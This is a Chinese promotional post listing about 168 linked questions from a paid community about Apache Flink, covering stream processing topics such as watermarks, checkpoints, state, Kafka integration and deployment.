如果学习 Flink 的过程中,遇到什么问题,可以在里面提问,我会优先解答,这里做个抱歉,自己平时工作也挺忙,微信的问题不能做全部做一些解答,
但肯定会优先回复给知识星球的付费用户的,庆幸的是现在星球里的活跃氛围还是可以的,有不少问题通过提问和解答的方式沉淀了下来。
1、[为何我使用 ValueState 保存状态 Job 恢复是状态没恢复?](https://t.zsxq.com/62rZV7q)
2、[flink中watermark究竟是如何生成的,生成的规则是什么,怎么用来处理乱序数据](https://t.zsxq.com/yF2rjmY)
3、[消费kafka数据的时候,如果遇到了脏数据,或者是不符合规则的数据等等怎么处理呢?](https://t.zsxq.com/uzFIeiq)
4、[在Kafka 集群中怎么指定读取/写入数据到指定broker或从指定broker的offset开始消费?](https://t.zsxq.com/Nz7QZBY)
5、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj)
6、[jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7)
7、[使用flink-web-ui提交作业并执行 但是/opt/flink/log目录下没有日志文件 请问关于flink的日志(包括jobmanager、taskmanager、每个job自己的日志默认分别存在哪个目录 )需要怎么配置?](https://t.zsxq.com/Nju7EuV)
8、[通过flink 仪表盘提交的jar 是存储在哪个目录下?](https://t.zsxq.com/6muRz3j)
9、[从Kafka消费数据进行etl清洗,把结果写入hdfs映射成hive表,压缩格式、hive直接能够读取flink写出的文件、按照文件大小或者时间滚动生成文件](https://t.zsxq.com/uvFQvFu)
10、[flink jar包上传至集群上运行,挂掉后,挂掉期间kafka中未被消费的数据,在重新启动程序后,是自动从checkpoint获取挂掉之前的kafka offset位置,自动消费之前的数据进行处理,还是需要某些手动的操作呢?](https://t.zsxq.com/ubIY33f)
11、[flink 启动时不自动创建 上传jar的路径,能指定一个创建好的目录吗](https://t.zsxq.com/UfA2rBy)
12、[Flink sink to es 集群上报 slot 不够,单机跑是好的,为什么?](https://t.zsxq.com/zBMnIA6)
13、[Fllink to elasticsearch如何创建索引文档期时间戳?](https://t.zsxq.com/qrZBAQJ)
14、[blink有没有api文档或者demo,是否建议blink用于生产环境。](https://t.zsxq.com/J2JiIMv)
15、[flink的Python api怎样?bug多吗?](https://t.zsxq.com/ZVVrjuv)
16、[Flink VS Spark Streaming VS Storm VS Kafka Stream ](https://t.zsxq.com/zbybQNf)
17、[你们做实时大屏的技术架构是什么样子的?flume→kafka→flink→redis,然后后端去redis里面捞数据,酱紫可行吗?](https://t.zsxq.com/Zf6meAm)
18、[做一个统计指标的时候,需要在Flink的计算过程中多次读写redis,感觉好怪,星主有没有好的方案?](https://t.zsxq.com/YniI2JQ)
19、[Flink 使用场景大分析,列举了很多的常用场景,可以好好参考一下](https://t.zsxq.com/fYZZfYf)
20、[将kafka中数据sink到mysql时,metadata的数据为空,导入mysql数据不成功???](https://t.zsxq.com/I6eEqR7)
21、[使用了ValueState来保存中间状态,在运行时中间状态保存正常,但是在手动停止后,再重新运行,发现中间状态值没有了,之前出现的键值是从0开始计数的,这是为什么?是需要实现CheckpointedFunction吗?](https://t.zsxq.com/62rZV7q)
22、[flink on yarn jobmanager的HA需要怎么配置。还是说yarn给管理了](https://t.zsxq.com/mQ7YbQJ)
23、[有两个数据流就行connect,其中一个是实时数据流(kafka 读取),另一个是配置流。由于配置流是从关系型数据库中读取,速度较慢,导致实时数据流流入数据的时候,配置信息还未发送,这样会导致有些实时数据读取不到配置信息。目前采取的措施是在connect方法后的flatmap的实现的在open 方法中,提前加载一次配置信息,感觉这种实现方式不友好,请问还有其他的实现方式吗?](https://t.zsxq.com/q3VvB6U)
24、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj)
25、[不采用yarm部署flink,还有其他的方案吗? 主要想解决服务器重启后,flink服务怎么自动拉起? jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7)
26、[在一个 Job 里将同份数据昨晚清洗操作后,sink 到后端多个地方(看业务需求),如何保持一致性?(一个sink出错,另外的也保证不能插入)](https://t.zsxq.com/bYnimQv)
27、[flink sql任务在某个特定阶段会发生tm和jm丢失心跳,是不是由于gc时间过长呢,](https://t.zsxq.com/YvBAyrV)
28、[有这样一个需求,统计用户近两周进入产品详情页的来源(1首页大搜索,2产品频道搜索,3其他),为php后端提供数据支持,该信息在端上报事件中,php直接获取有点困难。 我现在的解决方案 通过flink滚动窗口(半小时),统计用户半小时内3个来源pv,然后按照日期序列化,直接写mysql。php从数据库中解析出来,再去统计近两周占比。 问题1,这个需求适合用flink去做吗? 问题2,我的方案总感觉怪怪的,有没有好的方案?](https://t.zsxq.com/fayf2Vv)
29、[一个task slot 只能同时运行一个任务还是多个任务呢?如果task slot运行的任务比较大,会出现OOM的情况吗?](https://t.zsxq.com/ZFiY3VZ)
30、[你们怎么对线上flink做监控的,如果整个程序失败了怎么自动重启等等](https://t.zsxq.com/Yn2JqB6)
31、[flink cep规则动态解析有接触吗?有没有成型的框架?](https://t.zsxq.com/YFMFeaA)
32、[每一个Window都有一个watermark吗?window是怎么根据watermark进行触发或者销毁的?](https://t.zsxq.com/VZvRrjm)
33、[ CheckPoint与SavePoint的区别是什么?](https://t.zsxq.com/R3ZZJUF)
34、[flink可以在算子中共享状态吗?或者大佬你有什么方法可以共享状态的呢?](https://t.zsxq.com/Aa62Bim)
35、[运行几分钟就报了,看taskmager日志,报的是 failed elasticsearch bulk request null,可是我代码里面已经做过空值判断了呀 而且也过滤掉了,flink版本1.7.2 es版本6.3.1](https://t.zsxq.com/ayFmmMF)
36、[这种情况,我们调并行度 还是配置参数好](https://t.zsxq.com/Yzzzb2b)
37、[大家都用jdbc写,各种数据库增删查改拼sql有没有觉得很累,ps.set代码一大堆,还要计算每个参数的位置](https://t.zsxq.com/AqBUR3f)
38、[关于datasource的配置,每个taskmanager对应一个datasource?还是每个slot? 实际运行下来,每个slot中datasorce线程池只要设置1就行了,多了也用不到?](https://t.zsxq.com/AqBUR3f)
39、[kafka现在每天出现数据丢失,现在小批量数据,一天200W左右, kafka版本为 1.0.0,集群总共7个节点,TOPIC有十六个分区,单条报文1.5k左右](https://t.zsxq.com/AqBUR3f)
40、[根据key.hash的绝对值 对并发度求模,进行分组,假设10各并发度,实际只有8个分区有处理数据,有2个始终不处理,还有一个分区处理的数据是其他的三倍,如截图](https://t.zsxq.com/AqBUR3f)
41、[flink每7小时不知道在处理什么, CPU 负载 每7小时,有一次高峰,5分钟内平均负载超过0.8,如截图](https://t.zsxq.com/AqBUR3f)
42、[有没有Flink写的项目推荐?我想看到用Flink写的整体项目是怎么组织的,不单单是一个单例子](https://t.zsxq.com/M3fIMbu)
43、[Flink 源码的结构图](https://t.zsxq.com/yv7EQFA)
44、[我想根据不同业务表(case when)进行不同的redis sink(hash ,set),我要如何操作?](https://t.zsxq.com/vBAYNJq)
45、[这个需要清理什么数据呀,我把hdfs里面的已经清理了 启动还是报这个](https://t.zsxq.com/b2zbUJa)
46、[ 在流处理系统,在机器发生故障恢复之后,什么情况消息最多会被处理一次?什么情况消息最少会被处理一次呢?](https://t.zsxq.com/QjQFmQr)
47、[我检查点都调到5分钟了,这是什么问题](https://t.zsxq.com/zbQNfuJ)
48、[reduce方法后 那个交易时间 怎么不是最新的,是第一次进入的那个时间,](https://t.zsxq.com/ZrjEauN)
49、[Flink on Yarn 模式,用yarn session脚本启动的时候,我在后台没有看到到Jobmanager,TaskManager,ApplicationMaster这几个进程,想请问一下这是什么原因呢?因为之前看官网的时候,说Jobmanager就是一个jvm进程,Taskmanage也是一个JVM进程](https://t.zsxq.com/VJyr3bM)
50、[Flink on Yarn的时候得指定 多少个TaskManager和每个TaskManager slot去运行任务,这样做感觉不太合理,因为用户也不知道需要多少个TaskManager适合,Flink 有动态启动TaskManager的机制吗。](https://t.zsxq.com/VJyr3bM)
51、[参考这个例子,Flink 零基础实战教程:如何计算实时热门商品 | Jark's Blog, 窗口聚合的时候,用keywindow,用的是timeWindowAll,然后在aggregate的时候用aggregate(new CustomAggregateFunction(), new CustomWindowFunction()),打印结果后,发现窗口中一直使用的重复的数据,统计的结果也不变,去掉CustomWindowFunction()就正常了 ? 非常奇怪](https://t.zsxq.com/UBmUJMv)
52、[用户进入产品预定页面(端埋点上报),并填写了一些信息(端埋点上报),但半小时内并没有产生任何订单,然后给该类用户发送一个push。 1. 这种需求适合用flink去做吗?2. 如果适合,说下大概的思路](https://t.zsxq.com/naQb6aI)
53、[业务场景是实时获取数据存redis,请问我要如何按天、按周、按月分别存入redis里?(比方说过了一天自动换一个位置存redis)](https://t.zsxq.com/AUf2VNz)
54、[有人 AggregatingState 的例子吗, 感觉官方的例子和 官网的不太一样?](https://t.zsxq.com/UJ6Y7m2)
55、[flink-jdbc这个jar有吗?怎么没找到啊?1.8.0的没找到,1.6.2的有](https://t.zsxq.com/r3BaAY3)
56、[现有个关于savepoint的问题,操作流程为,取消任务时设置保存点,更新任务,从保存点启动任务;现在遇到个问题,假设我中间某个算子重写,原先通过state编写,有用定时器,现在更改后,采用窗口,反正就是实现方式完全不一样;从保存点启动就会一直报错,重启,原先的保存点不能还原,此时就会有很多数据重复等各种问题,如何才能保证数据不丢失,不重复等,恢复到停止的时候,现在想到的是记下kafka的偏移量,再做处理,貌似也不是很好弄,有什么解决办法吗](https://t.zsxq.com/jiybIee)
57、[需要在flink计算app页面访问时长,消费Kafka计算后输出到Kafka。第一条log需要等待第二条log的时间戳计算访问时长。我想问的是,flink是分布式的,那么它能否保证执行的顺序性?后来的数据有没有可能先被执行?](https://t.zsxq.com/eMJmiQz)
58、[我公司想做实时大屏,现有技术是将业务所需指标实时用spark拉到redis里存着,然后再用一条spark streaming流计算简单乘除运算,指标包含了各月份的比较。请问我该如何用flink简化上述流程?](https://t.zsxq.com/Y7e6aIu)
59、[flink on yarn 方式,这样理解不知道对不对,yarn-session这个脚本其实就是准备yarn环境的,执行run任务的时候,根据yarn-session初始化的yarnDescription 把 flink 任务的jobGraph提交到yarn上去执行](https://t.zsxq.com/QbIayJ6)
60、[同样的代码逻辑写在单独的main函数中就可以成功的消费kafka ,写在一个spring boot的程序中,接受外部请求,然后执行相同的逻辑就不能消费kafka。你遇到过吗?能给一些查问题的建议,或者在哪里打个断点,能看到为什么消费不到kafka的消息呢?](https://t.zsxq.com/VFMRbYN)
61、[请问下flink可以实现一个流中同时存在订单表和订单商品表的数据 两者是一对多的关系 能实现得到 以订单表为主 一个订单多个商品 这种需求嘛](https://t.zsxq.com/QNvjI6Q)
62、[在用中间状态的时候,如果中间一些信息保存在state中,有没有必要在redis中再保存一份,来做第三方的存储。](https://t.zsxq.com/6ie66EE)
63、[能否出一期flink state的文章。什么场景下用什么样的state?如,最简单的,实时累加update到state。](https://t.zsxq.com/bm6mYjI)
64、[flink的双流join博主有使用的经验吗?会有什么常见的问题吗](https://t.zsxq.com/II6AEe2)
65、[窗口触发的条件问题](https://t.zsxq.com/V7EmUZR)
66、[flink 定时任务怎么做?有相关的demo么?](https://t.zsxq.com/JY3NJam)
67、[流式处理过程中数据的一致性如何保证或者如何检测](https://t.zsxq.com/7YZ3Fuz)
68、[重启flink单机集群,还报job not found 异常。](https://t.zsxq.com/nEEQvzR)
69、[kafka的数据是用 org.apache.kafka.common.serialization.ByteArraySerialize序列化的,flink这边消费的时候怎么通过FlinkKafkaConsumer创建DataStream?](https://t.zsxq.com/qJyvzNj)
70、[现在公司有一个需求,一些用户的支付日志,通过sls收集,要把这些日志处理后,结果写入到MySQL,关键这些日志可能连着来好几条才是一个用户的,因为发起请求,响应等每个环节都有相应的日志,这几条日志综合处理才能得到最终的结果,请问博主有什么好的方法没有?](https://t.zsxq.com/byvnaEi)
71、[flink 支持hadoop 主备么? hadoop主节点挂了 flink 会切换到hadoop 备用节点?](https://t.zsxq.com/qfie6qR)
72、[请教大家: 实际 flink 开发中用 scala 多还是 java多些? 刚入手 flink 大数据 scala 需要深入学习么?](https://t.zsxq.com/ZVZzZv7)
73、[我使用的是flink是1.7.2最近用了split的方式分流,但是底层的SplitStream上却标注为Deprecated,请问是官方不推荐使用分流的方式吗?](https://t.zsxq.com/Qzbi6yn)
74、[KeyBy 的正确理解,和数据倾斜问题的解释](https://t.zsxq.com/Auf2NVR)
75、[用flink时,遇到个问题 checkpoint大概有2G左右, 有背压时,flink会重启有遇到过这个问题吗](https://t.zsxq.com/3vnIm62)
76、[flink使用yarn-session方式部署,如何保证yarn-session的稳定性,如果yarn-session挂了,需要重新部署一个yarn-session,如何恢复之前yarn-session上的job呢,之前的checkpoint还能使用吗?](https://t.zsxq.com/URzVBIm)
77、[我想请教一下关于sink的问题。我现在的需求是从Kafka消费Json数据,这个Json数据字段可能会增加,然后将拿到的json数据以parquet的格式存入hdfs。现在我可以拿到json数据的schema,但是在保存parquet文件的时候不知道怎么处理。一是flink没有专门的format parquet,二是对于可变字段的Json怎么处理成parquet比较合适?](https://t.zsxq.com/MjyN7Uf)
78、[flink如何在较大的数据量中做去重计算。](https://t.zsxq.com/6qBqVvZ)
79、[flink能在没有数据的时候也定时执行算子吗?](https://t.zsxq.com/Eqjyju7)
80、[使用rocksdb状态后端,自定义pojo怎么实现序列化和反序列化的,有相关demo么?](https://t.zsxq.com/i2zVfIi)
81、[check point 老是失败,是不是自定义的pojo问题?到本地可以,到hdfs就不行,网上也有很多类似的问题 都没有一个很好的解释和解决方案](https://t.zsxq.com/vRJujAi)
82、[cep规则如图,当start事件进入时,时间00:00:15,而后进入end事件,时间00:00:40。我发现规则无法命中。请问within 是从start事件开始计时?还是跟window一样根据系统时间划分的?如果是后者,请问怎么配置才能从start开始计时?](https://t.zsxq.com/MVFmuB6)
83、[Flink聚合结果直接写Mysql的幂等性设计问题](https://t.zsxq.com/EybM3vR)
84、[Flink job打开了checkpoint,用的rocksdb,通过观察hdfs上checkpoint目录,为啥算副本总量会暴增爆减](https://t.zsxq.com/62VzNRF)
85、[Flink 提交任务的 jar包可以指定路径为 HDFS 上的吗]()
86、[在flink web Ui上提交的任务,设置的并行度为2,flink是stand alone部署的。两个任务都正常的运行了几天了,今天有个地方逻辑需要修改,于是将任务cancel掉(在命令行cancel也试了),结果taskmanger挂掉了一个节点。后来用其他任务试了,也同样会导致节点挂掉](https://t.zsxq.com/VfimieI)
87、[一个配置动态更新的问题折腾好久(配置用个静态的map变量存着,有个线程定时去数据库捞数据然后存在这个map里面更新一把),本地 idea 调试没问题,集群部署就一直报 空指针异常。下游的算子使用这个静态变量map去get key在集群模式下会出现这个空指针异常,估计就是拿不到 map](https://t.zsxq.com/nee6qRv)
88、[批量写入MySQL,完成HBase批量写入](https://t.zsxq.com/3bEUZfQ)
89、[用flink清洗数据,其中要访问redis,根据redis的结果来决定是否把数据传递到下流,这有可能实现吗?](https://t.zsxq.com/Zb6AM3V)
90、[监控页面流处理的时候这个发送和接收字节为0。](https://t.zsxq.com/RbeYZvb)
91、[sink到MySQL,如果直接用idea的话可以运行,并且成功,大大的代码上面用的FlinkKafkaConsumer010,而我的Flink版本为1.7,kafka版本为2.12,所以当我用FlinkKafkaConsumer010就有问题,于是改为
FlinkKafkaConsumer就可以直接在idea完成sink到MySQL,但是为何当我把该程序打成Jar包,去运行的时候,就是报FlinkKafkaConsumer找不到呢](https://t.zsxq.com/MN7iuZf)
92、[SocketTextStreamWordCount中输入中文统计不出来,请问这个怎么解决,我猜测应该是需要修改一下代码,应该是这个例子默认统计英文](https://t.zsxq.com/e2VNN7Y)
93、[ Flink 应用程序本地 ide 里面运行的时候并行度是怎么算的?](https://t.zsxq.com/RVRn6AE)
94、[ 请问下flink中对于窗口的全量聚合有apply和process两种 他们有啥区别呢](https://t.zsxq.com/rzbIQBi)
95、[不知道大大熟悉Hbase不,我想直接在Hbase中查询某一列数据,因为有重复数据,所以想使用distinct统计实际数据量,请问Hbase中有没有类似于sql的distinct关键字。如果没有,想实现这种可以不?](https://t.zsxq.com/UJIubub)
96、[ 来分析一下现在Flink,Kafka方面的就业形势,以及准备就业该如何准备的这方面内容呢?](https://t.zsxq.com/VFaQn2j)
97、[ 大佬知道flink的dataStream可以转换为dataSet吗?因为数据需要11分钟一个批次计算五六个指标,并且涉及好几步reduce,计算的指标之间有联系,用Stream卡住了。](https://t.zsxq.com/Zn2FEQZ)
98、[1.如何在同一窗口内实现多次的聚合,比如像spark中的这样2.多个实时流的jion可以用window来处理一批次的数据吗?](https://t.zsxq.com/aIqjmQN)
99、[写的批处理的功能,现在本机跑是没问题的,就是在linux集群上出现了问题,就是不知道如果通过本地调用远程jar包然后传参数和拿到结果参数返回本机](https://t.zsxq.com/ZNvb2FM)
100、[我用standalone开启一个flink集群,上传flink官方用例Socket Window WordCount做测试,开启两个parallelism能正常运行,但是开启4个parallelism后出现错误](https://t.zsxq.com/femmiqf)
101、[ 有使用AssignerWithPunctuatedWatermarks 的案例Demo吗?网上找了都是AssignerWithPeriodicWatermarks的,不知道具体怎么使用?](https://t.zsxq.com/YZ3vbY3)
102、[ 有一个datastream(从文件读取的),然后我用flink sql进行计算,这个sql是一个加总的运算,然后通过retractStreamTableSink可以把文件做sql的结果输出到文件吗?这个输出到文件的接口是用什么呢?](https://t.zsxq.com/uzFyVJe)
103、[ 为啥split这个流设置为过期的](https://t.zsxq.com/6QNNrZz)
104、[ 需要使用flink table的水印机制控制时间的乱序问题,这种场景下我就使用水印+窗口了,我现在写的demo遇到了问题,就是在把触发计算的窗口table(WindowedTable)转换成table进行sql操作时发现窗口中的数据还是乱序的,是不是flink table的WindowedTable不支持水印窗口转table-sql的功能](https://t.zsxq.com/Q7YNRBE)
105、[ Flink 对 SQL 的重视性](https://t.zsxq.com/Jmayrbi)
106、[ flink job打开了checkpoint,任务跑了几个小时后就出现下面的错,截图是打出来的日志,有个OOM,又遇到过的没?](https://t.zsxq.com/ZrZfa2Z)
107、[ 本地测试是有数据的,之前该任务放在集群也是有数据的,可能提交过多次,现在读不到数据了 group id 也换过了, 只能重启集群解决么?](https://t.zsxq.com/emaAeyj)
108、[使用flink清洗数据存到es中,直接在flatmap中对处理出来的数据用es自己的ClientInterface类直接将数据存入es当中,不走sink,这样的处理逻辑是不是会有问题。](https://t.zsxq.com/ayBa6am)
108、[ flink从kafka拿数据(即增量数据)与存量数据进行内存聚合的需求,现在有一个方案就是程序启动的时候先用flink table将存量数据加载到内存中创建table中,然后将stream的增量数据与table的数据进行关联聚合后输出结束,不知道这种方案可行么。目前个人认为有两个主要问题:1是增量数据stream转化成append table后不知道能与存量的table关联聚合不,2是聚合后输出的结果数据是否过于频繁造成网络传输压力过大](https://t.zsxq.com/QNvbE62)
109、[ 设置时间时间特性有什么区别呢, 分别在什么场景下使用呢?两种设置时间延迟有什么区别呢 , 分别在什么场景下使用](https://t.zsxq.com/yzjAQ7a)
110、[ flink从rabbitmq中读取数据,设置了rabbitmq的CorrelationDataId和checkpoint为EXACTLY_ONCE;如果flink完成一次checkpoint后,在这次checkpoint之前消费的数据都会从mq中删除。如果某次flink停机更新,那就会出现mq中的一些数据消费但是处于Unacked状态。在flink又重新开启后这批数据又会重新消费。那这样是不是就不能保证EXACTLY_ONCE了](https://t.zsxq.com/qRrJEaa)
111、[1. 在Flink checkpoint 中, 像 operator的状态信息 是在设置了checkpoint 之后自动的进行快照吗 ?2. 上面这个和我们手动存储的 Keyed State 进行快照(这个应该是增量快照)](https://t.zsxq.com/mAqn2RF)
112、[现在有个实时商品数,交易额这种统计需求,打算用 flink从kafka读取binglog日志进行计算,但binglog涉及到insert和update这种操作时 怎么处理才能统计准确,避免那种重复计算的问题?](https://t.zsxq.com/E2BeQ3f)
113、[我这边用flink做实时监控,功能很简单,就是每条消息做keyby然后三分钟窗口,然后做些去重操作,触发阈值则报警,现在问题是同一个时间窗口同一个人的告警会触发两次,集群是三台机器,standalone cluster,初步结果是三个算子里有两个收到了同样的数据](https://t.zsxq.com/vjIeyFI)
114、[在使用WaterMark的时候,默认是每200ms去设置一次watermark,那么每个taskmanager之间,由于得到的数据不同,所以往往产生的最大的watermark不同。 那么这个时候,是各个taskmanager广播这个watermark,得到全局的最大的watermark,还是说各个taskmanager都各自用自己的watermark。主要没看到广播watermark的源码。不知道是自己观察不仔细还是就是没有广播这个变量。](https://t.zsxq.com/unq3FIa)
115、[现在遇到一个需求,需要在job内部定时去读取redis的信息,想请教flink能实现像普通程序那样的定时任务吗?](https://t.zsxq.com/AeUnAyN)
116、[有个触发事件开始聚合,等到数量足够,或者超时则sink推mq 环境 flink 1.6 用了mapState 记录触发事件 1 数据足够这个OK 2 超时state ttl 1.6支持,但是问题来了,如何在超时时候增加自定义处理?](https://t.zsxq.com/z7uZbY3)
117、[请问impala这种mpp架构的sql引擎,为什么稳定性比较差呢?](https://t.zsxq.com/R7UjeUF)
118、[watermark跟并行度相关不是,过于全局了,期望是keyby之后再针对每个keyed stream 打watermark,这个有什么好的实践呢?](https://t.zsxq.com/q7myfAQ)
119、[请问如果把一个文件的内容读取成datastream和dataset,有什么区别吗??他们都是一条数据一条数据的被读取吗?](https://t.zsxq.com/rB6yfeA)
120、[有没有kylin相关的资料,或者调优的经验?](https://t.zsxq.com/j2j6EyJ)
121、[flink先从jdbc读取配置表到流中,另外从kafka中新增或者修改这个配置,这个场景怎么把两个流一份配置流?我用的connect,接着发不成广播变量,再和实体流合并,但在合并时报Exception in thread ""main"" java.lang.IllegalArgumentException](https://t.zsxq.com/iMjmQVV)
122、[Flink exactly-once,kafka版本为0.11.0 ,sink基于FlinkKafkaProducer 每五分钟一次checkpoint,但是checkpoint开始后系统直接卡死,at-lease-once 一分钟能完成的checkpoint, 现在十分钟无法完成没进度还是0, 不知道哪里卡住了](https://t.zsxq.com/RFQNFIa)
123、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2)
124、[Flink异步IO中,下图这两种有什么区别?为啥要加 CompletableFuture.supplyAsync,不太明白?](https://t.zsxq.com/NJq3rj2)
125、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2)
126、[有个计算场景,从kafka消费两个数据源,两个数据结构都有时间段概念,计算需要做的是匹配两个时间段,匹配到了,就生成一条新的记录。请问使用哪个工具更合适,flink table还是cep?请大神指点一下 我这边之前的做法,将两个数据流转为table.两个table over window后join成新的表。结果job跑一会就oom.](https://t.zsxq.com/rniUrjm)
127、[一个互联网公司,或者一个业务系统,如果想做一个全面的监控要怎么做?有什么成熟的方案可以参考交流吗?有什么有什么度量指标吗?](https://t.zsxq.com/vRZ7qJ2)
128、[怎么深入学习flink,或者其他大数据组件,能为未来秋招找一份大数据相关(计算方向)的工作增加自己的竞争力?](https://t.zsxq.com/3vfyJau)
129、[oppo的实时数仓,其中明细层和汇总层都在kafka中,他们的关系库的实时数据也抽取到kafka的ods,那么在构建数仓的,需要join 三四个大业务表,业务表会变化,那么是大的业务表是从kafka的ods读取吗?实时数仓,多个大表join可以吗](https://t.zsxq.com/VBIunun)
130、[Tuple类型有什么方法转换成json字符串吗?现在的场景是,结果在存储到sink中时希望存的是json字符串,这样应用程序获取数据比较好转换一点。如果Tuple不好转换json字符串,那么应该以什么数据格式存储到sink中](https://t.zsxq.com/vnaURzj)
140、[端到端的数据保证,是否意味着中间处理程序中断,也不会造成该批次处理失败的消息丢失,处理程序重新启动之后,会再次处理上次未处理的消息](https://t.zsxq.com/J6eAmYb)
141、[关于flink datastream window相关的。比如我现在使用滚动窗口,统计一周内去重用户指标,按照正常watermark触发计算,需要等到当前周的window到达window的endtime时,才会触发,这样指标一周后才能产出结果。我能不能实现一小时触发一次计算,每次统计截止到当前时间,window中所有到达元素的去重数量。](https://t.zsxq.com/7qBMrBe)
142、[FLIP-16 Loop Fault Tolerance 是讲现在的checkpoint机制无法在stream loop的时候容错吗?现在这个问题解决了没有呀?](https://t.zsxq.com/uJqzBIe)
143、[现在的需求是,统计各个key的今日累计值,一分钟输出一次。如,各个用户今日累计点击次数。这种需求用datastream还是table API方便点?](https://t.zsxq.com/uZnmQzv)
144、[本地idea可以跑的工程,放在standalone集群上,总报错,报错截图如下,大佬请问这是啥原因](https://t.zsxq.com/BqnYRN7)
145、[比如现在用k8s起了一个flink集群,这时候数据源kafka或者hdfs会在同一个集群上吗,还是会单独再起一个hdfs/kafka集群](https://t.zsxq.com/7MJujMb)
146、[flink kafka sink 的FlinkFixedPartitioner 分配策略,在并行度小于topic的partitions时,一个并行实例固定的写消息到固定的一个partition,那么就有一些partition没数据写进去?](https://t.zsxq.com/6U7QFMj)
147、[基于事件时间,每五分钟一个窗口,五秒钟滑动一次,同时watermark的时间同样是基于事件事件时间的,延迟设为1分钟,假如数据流从12:00开始,如果12:07-12:09期间没有产生任何一条数据,即在12:07-12:09这段间的数据流情况为···· (12:07:00,xxx),(12:09:00,xxx)······,那么窗口[12:02:05-12:07:05],[12:02:10-12:07:10]等几个窗口的计算是否意味着只有等到,12:09:00的数据到达之后才会触发](https://t.zsxq.com/fmq3fYF)
148、[使用flink1.7,当消费到某条消息(protobuf格式),报Caused by: org.apache.kafka.common.KafkaException: Record batch for partition Notify-18 at offset 1803009 is invalid, cause: Record is corrupt 这个异常。 如何设置跳过已损坏的消息继续消费下一条来保证业务不终断? 我看了官网kafka connectors那里,说在DeserializationSchema.deserialize(...)方法中返回null,flink就会跳过这条消息,然而依旧报这个异常](https://t.zsxq.com/MRvv3ZV)
149、[是否可以抽空总结一篇Flink 的 watermark 的原理案例?一直没搞明白基于事件时间处理时的数据乱序和数据迟到底咋回事](https://t.zsxq.com/MRJeAuj)
150、[flink中rpc通信的原理,与几个类的讲解,有没有系统详细的文章样,如有求分享,谢谢](https://t.zsxq.com/2rJyNrF)
151、[Flink中如何使用基于事件时间处理,但是又不使用Watermarks? 我在会话窗口中使用遇到一些问题,图一是基于处理时间的,测试结果session是基于keyby(用户)的,图二是基于事件时间的,不知道是我用法不对还是怎么的,测试结果发现并不是基于keyby(用户的),而是全局的session。不知道怎么修改?](https://t.zsxq.com/bM3ZZRf)
152、[flink实时计算平台,yarn模式日志收集怎么做,为什么会checkpoint失败,报警处理,后需要做什么吗?job监控怎么做](https://t.zsxq.com/BMVzzzB)
153、[有flink与jstorm的在不同应用场景下, 性能比较的数据吗? 从网络上能找大部分都是flink与storm的比较. 在jstorm官网上有一份比较的图表, 感觉参考意义不大, 应该是比较早的flink版本.](https://t.zsxq.com/237EAay)
154、[为什么使用SessionWindows.withGap窗口的话,State存不了东西呀,每次加1 ,拿出来都是null, 我换成 TimeWindow就没问题。](https://t.zsxq.com/J6eAmYb)
155、[请问一下,flink datastream流处理怎么统计去重指标? 官方文档中只看到批处理有distinct概念。](https://t.zsxq.com/y3nYZrf)
156、[好全的一篇文章,对比分析 Flink,Spark Streaming,Storm 框架](https://t.zsxq.com/qRjqFY3)
157、[关于 structured_streaming 的 paper](https://t.zsxq.com/Eau7qNB)
158、[zookeeper集群切换领导了,flink集群项目重启了就没有数据的输入和输出了,这个该从哪方面入手解决?](https://t.zsxq.com/rFYbEeq)
159、[我想请教下datastream怎么和静态数据join呢](https://t.zsxq.com/nEAaYNF)
160、[时钟问题导致收到了明天的数据,这时候有什么比较好的处理方法?看到有人设置一个最大的跳跃阈值,如果当前数据时间 - 历史最大时间 超过阈值就不更新。如何合理的设计水印,有没有一些经验呢?](https://t.zsxq.com/IAAeiA6)
161、[大佬们flink怎么定时查询数据库?](https://t.zsxq.com/EuJ2RRf)
162、[现在我们公司有个想法,就是提供一个页面,在页面上选择source sink 填写上sql语句,然后后台生成一个flink的作业,然后提交到集群。功能有点类似于华为的数据中台,就是页面傻瓜式操作。后台能自动根据相应配置得到结果。请问拘你的了解,可以实现吗?如何实现?有什么好的思路。现在我无从下手](https://t.zsxq.com/vzZBmYB)
163、[请教一下 flink on yarn 的 ha机制](https://t.zsxq.com/VRFIMfy)
164、[在一般的流处理以及cep, 都可以对于eventtime设置watermark, 有时可能需要设置相对大一点的值, 这内存压力就比较大, 有没有办法不应用jvm中的内存, 而用堆外内存, 或者其他缓存, 最好有cache机制, 这样可以应对大流量的峰值.](https://t.zsxq.com/FAiiEyr)
165、[请教一个flink sql的问题。我有两个聚合后的流表A和B,A和Bjoin得到C表。在设置state TTL 的时候是直接对C表设置还是,对A表和B表设置比较好?](https://t.zsxq.com/YnI2F66)
166、[spark改写为flink,会不会很复杂,还有这两者在SQL方面的支持差别大吗?](https://t.zsxq.com/unyneEU)
167、[请问flink allowedLateness导致窗口被多次fire,最终数据重复消费,这种问题怎么处理,数据是写到es中](https://t.zsxq.com/RfyZFUR)
168、[设置taskmanager.numberOfTaskSlots: 4的时候没有问题,但是cpu没有压上去,只用了30%左右,于是设置了taskmanager.numberOfTaskSlots: 8,但是就报错误找不到其中一个自定义的类,然后kafka数据就不消费了。为什么?cpu到多少合适?slot是不是和cpu数量一致是最佳配置?kafka分区数多少合适,是不是和slot,parallesim一致最佳?](https://t.zsxq.com/bIAEyFe)
